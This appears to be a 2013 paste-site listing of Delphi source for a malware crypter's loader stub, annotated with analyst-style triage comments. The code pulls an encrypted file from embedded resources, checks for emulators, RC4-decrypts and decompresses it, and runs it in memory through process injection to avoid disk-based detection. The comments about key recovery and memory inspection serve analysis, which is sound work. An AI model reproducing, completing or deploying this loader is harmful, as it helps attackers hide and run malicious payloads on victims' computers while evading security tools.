Author: winner13. Date 2013-01-02 18:27:49, views: 1021, Raw

program Main;

uses
  Windows, Util, Bytes, Unit2;

{ Start of stub }

{ Analyst summary (derived from the statements below):
  This program is a loader stub. It reads a settings record and an embedded
  file from two named resources ('S' and 'F'), optionally RC4-decrypts and
  decompresses the embedded file in memory, and then passes the resulting
  buffer to MemoryExecute with ParamStr(0) (the stub's own path) as the
  second argument.

  LoadApp, ResGet, AntiEmulaters, RC4, CharArrayToString, DeCompress,
  MemoryExecute and the TSettings record are not declared on this page
  (presumably they live in Util, Bytes or Unit2), so notes about what they do
  are inferred from names and from the author's own comments.

  Points that matter for triage and detection:
    - The decrypted file is never written to disk in this listing. It exists
      only in Buffer and in the iFile heap block, so memory inspection is more
      useful here than file scanning.
    - The RC4 key is read from the same settings record that is copied out of
      resource 'S'. The key therefore ships inside the sample next to the
      encrypted data, which allows static recovery of the embedded file.
    - One MessageBox call is left active (caption 'Info', text
      'Get Settings + Assign'). A build made from this exact source shows
      that dialog and waits for it to be dismissed before doing anything else.
    - The call to AntiEmulaters can end the run early, so an analysis run
      that shows no activity does not mean the sample is inert. }
var
  Buffer          : AnsiString;  // working copy of the embedded file
  SettingsPointer : Pointer;     // value returned by ResGet for resource 'S'
  SettingsLength  : Integer;     // passed to ResGet, then used as the byte count for the settings copy
  sInfo           : TSettings;   // settings record; fields read here: AntiE, Encrypt, Key, Compress
  iBuffer         : Integer;     // passed to ResGet for resource 'F', then used as the length of Buffer
  iFile           : Pointer;     // first the value returned by ResGet for 'F', later a GetMem block
begin
  //MessageBox(0, 'Begin', 'Info', MB_OK);
  LoadApp; // Author's note: "Load API's Dynamically." LoadApp is not shown on this page.
  iBuffer := 0;

  // Only debug dialog that is still active; a visible behavioural marker.
  MessageBox(0, 'Get Settings + Assign', 'Info', MB_OK);

  // Stage 1: copy the settings record out of resource 'S'.
  // NOTE(review): SettingsPointer is not checked for nil and SettingsLength is
  // not compared with SizeOf(sInfo) before the copy.
  SettingsPointer := ResGet(SettingsLength, 'S');
  Move(SettingsPointer^, sInfo, SettingsLength); // Get Settings + Assign.

  // Stage 2: optional environment check. If the flag is set and AntiEmulaters
  // returns True the program exits before the embedded file is touched.
  If sInfo.AntiE then begin If AntiEmulaters then Exit else end; // Check for Emulators - ChainCoder's code.

  // Disabled by the author: VMware / Virtual PC check.
  //If sInfo.AntiV then begin If IsVMwarePresent then Exit else end; // Check for Vmware and Virtual PC. // Removed this as was crashing for some reason

  //MessageBox(0, 'Get File from Resources', 'Info', MB_OK);
  // Stage 3: fetch the embedded file from resource 'F' and copy it into Buffer.
  iFile := ResGet(iBuffer, 'F');
  SetLength(Buffer, iBuffer);
  if iFile = nil then ExitProcess(0); // Get File from Resources, // if no file found Exit.
  // You could also add binder support by adding loops to loop through the files in resources
  Move(iFile^, Buffer[1], Length(Buffer));

  //MessageBox(0, 'Decrypt File with RC4', 'Info', MB_OK);
  // Stage 4: optional RC4 pass; the key is taken from sInfo.Key (see summary).
  If sInfo.Encrypt then Buffer := RC4(Buffer, PChar(CharArrayToString(sInfo.Key))); // Decrypt file with RC4, if RC4 was selected.

  //MessageBox(0, 'DeCompress File', 'Info', MB_OK);
  // Stage 5: optional decompression, applied after the RC4 pass.
  If sInfo.Compress then Buffer := DeCompress(Buffer); // DeCompress Buffer, if compression was selected.

  // Stage 6: copy the processed file into a separately allocated heap block.
  // From here on iFile points at that block instead of the resource data.
  GetMem(iFile, Length(Buffer));
  Move(Buffer[1], iFile^, Length(Buffer));

  //MessageBox(0, 'Execute file in Memory', 'Info', MB_OK);
  //Memory Execute(File, Process to Inject into, File Parameters, Visible)
  // Stage 7: hand the in-memory file to MemoryExecute. The second argument is
  // ParamStr(0), i.e. the stub's own executable path. Going by the author's
  // parameter note above, a second process created from the stub's own image
  // is the likely runtime artefact - presumably; confirm against the
  // MemoryExecute implementation.
  // The early Exit on failure skips the FreeMem call below.
  if not MemoryExecute(iFile, ParamStr(0), '', True) then Exit; // Injecting file into Memory, otherwise Exit.

  //MessageBox(0, 'File has been Executed.', 'Info', MB_OK);
  FreeMem(iFile);
  Exit;
end.
{ End of Stub }